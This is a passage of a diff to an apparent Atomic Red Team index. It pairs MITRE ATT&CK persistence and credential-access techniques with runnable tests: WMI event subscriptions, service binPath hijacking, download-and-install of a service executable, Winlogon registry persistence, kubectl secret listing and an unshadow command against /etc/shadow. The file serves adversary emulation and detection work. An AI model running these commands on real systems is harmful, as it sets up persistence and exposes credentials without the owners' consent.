machine. - After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. - - Code references - - https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af - - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - supported_platforms: - - windows - executor: - command: | - $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; - $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - - $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} - $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - - $FilterToConsumerArgs = @{ - Filter = [Ref] $Filter; - Consumer = [Ref] $Consumer; - } - $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs - cleanup_command: | - $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject - $EventConsumerToCleanup | Remove-WmiObject - $EventFilterToCleanup | Remove-WmiObject - name: powershell - elevation_required: true - T1543.003: - technique: - id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 - description: "Adversaries may create or modify Windows services to repeatedly - execute malicious payloads as part of persistence. When Windows boots up, - it starts programs or applications called services that perform background - system functions.(Citation: TechNet Services) Windows service configuration - information, including the file path to the service's executable or recovery - programs/commands, is stored in the Windows Registry. Service configurations - can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). - \n\nAdversaries may install a new service or modify an existing service by - using system utilities to interact with services, by directly modifying the - Registry, or by using custom tools to interact with the Windows API. Adversaries - may configure services to execute at startup in order to persist on a system.\n\nAn - adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) - by using a service name from a related operating system or benign software, - or by modifying existing services to make detection analysis more challenging. - Modifying existing services may interrupt their functionality or may enable - services that are disabled or otherwise not commonly used. \n\nServices may - be created with administrator privileges but are executed under SYSTEM privileges, - so an adversary may also use a service to escalate privileges from administrator - to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " - name: Windows Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.003 - url: https://attack.mitre.org/techniques/T1543/003 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 - description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service - was installed in the system. Retrieved August 7, 2018.' - source_name: Microsoft 4697 APR 2017 - - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection - description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding - to help with intrusion detection. Retrieved August 7, 2018. - source_name: Microsoft Windows Event Forwarding FEB 2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:49:58.490Z' - created: '2020-01-17T19:13:50.402Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - x_mitre_detection: "Monitor processes and command-line arguments for actions - that could create or modify services. Command-line invocation of tools capable - of adding or modifying services may be unusual, depending on how systems are - typically used in a particular environment. Services may also be modified - through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional - logging may need to be configured to gather the appropriate data. Remote access - tools with built-in features may also interact directly with the Windows API - to perform these functions outside of typical system utilities. Collect service - utility execution and service binary path arguments used for analysis. Service - binary paths may even be changed to execute commands or scripts. \n\nLook - for changes to service Registry entries that do not correlate with known software, - patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. - Changes to the binary path and the service startup type changed from manual - or disabled to automatic, if it does not typically do so, may be suspicious. - Tools such as Sysinternals Autoruns may also be used to detect system service - changes that could be attempts at persistence.(Citation: TechNet Autoruns) - \ \n\nCreation of new services may generate an alterable event (ex: Event - ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft - Windows Event Forwarding FEB 2018)). New, benign services may be created during - installation of new software.\n\nSuspicious program execution through services - may show up as outlier processes that have not been seen before when compared - against historical data. Look for abnormal process call trees from known services - and for execution of other commands that could relate to Discovery or other - adversary techniques. Data and events should not be viewed in isolation, but - as part of a chain of behavior that could lead to other activities, such as - network connections made for Command and Control, learning details about the - environment through Discovery, and Lateral Movement." - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Matthew Demaske, Adaptforward - - Travis Smith, Tripwire - - Pedro Harrison - identifier: T1543.003 - atomic_tests: - - name: Modify Fax service to run PowerShell - auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - description: | - This test will temporarily modify the service Fax by changing the binPath to PowerShell - and will then revert the binPath change, restoring Fax to its original state. - Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" - sc start Fax - cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul - 2>&1 - - name: Service Installation CMD - auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - description: | - Download an executable from github and start it as a service. - Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_CMD - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: command_prompt - elevation_required: true - command: | - sc.exe create #{service_name} binPath= #{binary_path} - sc.exe start #{service_name} - cleanup_command: | - sc.exe stop #{service_name} >nul 2>&1 - sc.exe delete #{service_name} >nul 2>&1 - - name: Service Installation PowerShell - auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - description: | - Installs A Local Service via PowerShell. - Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_PowerShell - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: powershell - elevation_required: true - command: | - New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" - Start-Service -Name "#{service_name}" - cleanup_command: | - Stop-Service -Name "#{service_name}" 2>&1 | Out-Null - try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} - catch {} - T1547.004: - technique: - created: '2020-01-24T16:59:59.688Z' - modified: '2020-04-21T16:00:41.277Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 - description: "Adversaries may abuse features of Winlogon to execute DLLs and/or - executables when a user logs in. Winlogon.exe is a Windows component responsible - for actions at logon/logoff as well as the secure attention sequence (SAS) - triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish persistence." - name: Winlogon Helper DLL - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.004 - url: https://attack.mitre.org/techniques/T1547/004 - - external_id: CAPEC-579 - source_name: capec - url: https://capec.mitre.org/data/definitions/579.html - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. - - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.004 - atomic_tests: - - name: Winlogon Shell Key Persistence - PowerShell - auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - description: | - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Shell" "explorer.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Userinit Key Persistence - PowerShell - auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - description: | - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Notify Key Logon Persistence - PowerShell - auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - description: | - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - - Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of notification package to execute - type: Path - default: C:\Windows\Temp\atomicNotificationPackage.dll - executor: - command: | - New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force - Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force - cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" - -Force -ErrorAction Ignore - -' - name: powershell credential-access: T1003.008: technique: + created: '2020-02-11T18:46:56.263Z' + modified: '2020-03-20T15:56:55.022Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4 + description: | + Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) + + The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db + name: "/etc/passwd and /etc/shadow" + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - url: https://attack.mitre.org/techniques/T1003/008 external_id: T1003.008 @@ -18093,31 +30,19 @@ credential-access: 2020.' url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ source_name: nixCraft - John the Ripper - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: "/etc/passwd and /etc/shadow" - description: | - Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) - - The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db - id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-20T15:56:55.022Z' - created: '2020-02-11T18:46:56.263Z' + x_mitre_platforms: + - Linux + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - root x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs. - x_mitre_permissions_required: - - root - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Access' identifier: T1003.008 atomic_tests: - name: Access /etc/shadow (Local) @@ -18174,7 +99,7 @@ credential-access: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -18196,7 +121,7 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-16T15:22:11.604Z' + modified: '2021-04-21T16:41:35.256Z' created: '2020-10-15T12:05:58.755Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -18208,8 +133,8 @@ credential-access: map to a single MAC address, this could be an indicator that the ARP cache has been poisoned." x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Jon Sternstein, Stern Security x_mitre_platforms: @@ -18307,8 +232,7 @@ credential-access: Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)' x_mitre_data_sources: - - Windows event logs - - Authentication logs + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - James Dunn, @jamdunnDFW, EY - Swapnil Kumbhar @@ -18357,9 +281,8 @@ credential-access: on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -18419,18 +342,18 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-21T16:38:27.781Z' + modified: '2021-04-14T12:04:36.243Z' created: '2017-05-31T21:31:22.767Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - SaaS - - GCP - - AWS - - Azure + - Google Workspace + - Containers x_mitre_permissions_required: - User x_mitre_detection: Monitor authentication logs for system and application login @@ -18441,11 +364,15 @@ credential-access: from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. x_mitre_data_sources: - - Office 365 account logs - - Authentication logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Magno Logan, @magnologan, Trend Micro + - Yossi Weizman, Azure Defender Research Team - Ed Williams, Trustwave, SpiderLabs - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_is_subtechnique: false atomic_tests: [] T1003.005: @@ -18495,9 +422,7 @@ credential-access: Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. x_mitre_data_sources: - - PowerShell logs - - Process command-line parameters - - Process monitoring + - 'Command: Command Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -18540,26 +465,109 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-15T19:39:34.817Z' + modified: '2021-03-31T19:41:06.948Z' created: '2020-02-11T18:47:46.619Z' x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Authentication logs - - AWS CloudTrail logs - - Azure activity logs - x_mitre_detection: |+ + - 'User Account: User Account Authentication' + x_mitre_detection: |- Monitor access to the Instance Metadata API and look for anomalous queries. - It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. - - x_mitre_version: '1.1' + It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078). + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] + T1552.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1552.007 + url: https://attack.mitre.org/techniques/T1552/007 + - source_name: Docker API + url: https://docs.docker.com/engine/api/v1.41/ + description: Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved + March 31, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + - source_name: Unit 42 Unsecured Docker Daemons + url: https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ + description: Chen, J.. (2020, January 29). Attacker's Tactics and Techniques + in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container API + description: "Adversaries may gather credentials via APIs within a containers + environment. APIs in these environments, such as the Docker API and Kubernetes + APIs, allow a user to remotely manage their container resources and cluster + components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary + may access the Docker API to collect logs that contain credentials to cloud, + container, and various other resources in the environment.(Citation: Unit + 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such + as via a pod's service account, may also use the Kubernetes API to retrieve + credentials from the Kubernetes API server. These credentials may include + those needed for Docker API authentication or secrets from Kubernetes cluster + components. " + id: attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-12T18:20:31.636Z' + created: '2021-03-31T14:01:52.321Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs. + + It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078). + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Jay Chen, Palo Alto Networks + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Access' + - 'User Account: User Account Authentication' + identifier: T1552.007 + atomic_tests: + - name: ListSecrets + auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + description: 'A Kubernetes secret is an object that lets users store and manage + sensitive information, such as passwords and connection strings in the cluster. + Secrets can be consumed by reference in the pod configuration. Attackers who + have permissions to retrieve the secrets from the API server (by using the + pod service account, for example) can access sensitive information that might + include credentials to various services. + +' + supported_platforms: + - macos + - linux + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get secrets -n #{namespace} + +' + name: bash + elevation_required: false T1056.004: technique: external_references: @@ -18577,7 +585,7 @@ credential-access: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.' @@ -18627,9 +635,9 @@ credential-access: description: | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: - * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) - * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) + * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 type: attack-pattern kill_chain_phases: @@ -18637,15 +645,11 @@ credential-access: phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T21:29:13.565Z' + modified: '2020-11-10T18:29:31.138Z' created: '2020-02-11T19:01:15.930Z' x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Metadata' x_mitre_permissions_required: - Administrator - SYSTEM @@ -18737,20 +741,20 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.475Z' + modified: '2021-04-06T12:31:06.695Z' created: '2020-02-11T18:39:59.959Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt @@ -18758,27 +762,21 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: - Diogo Fernandes - Anastasios Pingios atomic_tests: [] T1552.001: technique: - created: '2020-02-04T12:52:13.006Z' - modified: '2020-03-25T18:30:10.630Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc description: |- Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) - In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage) + In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage) name: Credentials In Files created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -18798,22 +796,39 @@ credential-access: description: 'Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.' source_name: SRD GPP + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' + - source_name: Unit 42 Unsecured Docker Daemons + url: 